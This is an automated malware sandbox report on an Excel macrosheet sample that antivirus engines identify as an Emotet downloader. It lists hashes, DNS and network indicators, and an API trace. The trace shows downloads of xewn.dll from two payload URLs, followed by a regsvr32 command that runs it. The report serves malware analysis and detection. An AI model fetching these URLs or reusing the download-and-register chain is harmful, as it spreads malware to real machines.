popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Sk7iJ9

MS_XLSX_Macrosheet
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 23, 2022, 12:39 p.m. May 23, 2022, 12:41 p.m.
Size 46.6KB
Type Microsoft Excel 2007+
MD5 55b8a285e688901b23630d99610ecd13
SHA256 1bdada6954ab20722dfb51b2ace2e6fcdfb556210c74bb059752552f5fa8f78f
CRC32 672FD58C
ssdeep 768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Yara
  • MS_XLSX_with_Macrosheet - (no description)

Name Response Post-Analysis Lookup
gonorthhalifax.com
A 216.239.34.21
A 216.239.36.21
A 216.239.38.21
A 216.239.32.21
216.239.38.21
www.gonorthhalifax.ca
CNAME gcdn0.wixdns.net
A 34.117.168.233
CNAME td-ccm-168-233.wixdns.net
34.117.168.233
eles-tech.com
IP Address Status Action
164.124.101.2 Active Moloch
216.239.32.21 Active Moloch
34.117.168.233 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 34.117.168.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49165
34.117.168.233:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA CN=gonorthhalifax.ca ca:f2:8f:fe:2b:67:7e:63:08:5b:8f:bf:f9:59:06:a0:a7:8b:c9:91

request GET http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
request GET https://www.gonorthhalifax.ca/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fbe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fbd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fae1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6faa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\xewn.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$Sk7iJ9
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Sk7iJ9
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://eles-tech.com/css/KzMysMqFMs/
stack_pivoted: 0
filepath_r: ..\xewn.dll
filepath: C:\Users\test22\xewn.dll
2148270085 0

URLDownloadToFileW

 url: http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
stack_pivoted: 0
filepath_r: ..\xewn.dll
filepath: C:\Users\test22\xewn.dll
1 0 0
parent_process excel.exe martian_process C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Lionic Trojan.MSOffice.Emotet.4!c
MicroWorld-eScan Trojan.GenericKD.48779066
FireEye Trojan.GenericKD.48779066
CAT-QuickHeal DOC.Emotet.45887
McAfee Downloader-FCHG!B1064BE65285
Sangfor Malware.Generic-XLM.Save.ma35
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
K7GW Trojan ( 0058ce181 )
K7AntiVirus Trojan ( 0058ce181 )
VirIT X97M.Emotet.DHA
Cyren XLSM/Emotet.A.gen!Camelot
Symantec Trojan.Mdropper
ESET-NOD32 multiple detections
Avast VBS:Malware-gen
Kaspersky HEUR:Trojan.MSOffice.Emotet.gen
BitDefender Trojan.GenericKD.48779066
Tencent Trojan.MsOffice.XmlMacroSheet.11019672
Ad-Aware Trojan.GenericKD.48779066
Sophos Mal/DocDl-P
DrWeb X97M.DownLoader.961
TrendMicro Trojan.XF.EMOTET.SMYXCCOA
McAfee-GW-Edition X97M/Downloader.kj
Emsisoft Trojan.GenericKD.48779066 (B)
Ikarus Trojan-Downloader.XLM.Agent
Avira W97M/Dldr.Emotet.FE
Microsoft TrojanDownloader:O97M/Emotet.PDWB!MTB
ViRobot XLS.Z.Agent.47738.BJ
GData Macro.Trojan-Downloader.Agent.BDH
Cynet Malicious (score: 99)
MAX malware (ai score=83)
Zoner Probably Heur.W97ShellN
Fortinet MSExcel/Agent.DVP!tr.dldr
AVG VBS:Malware-gen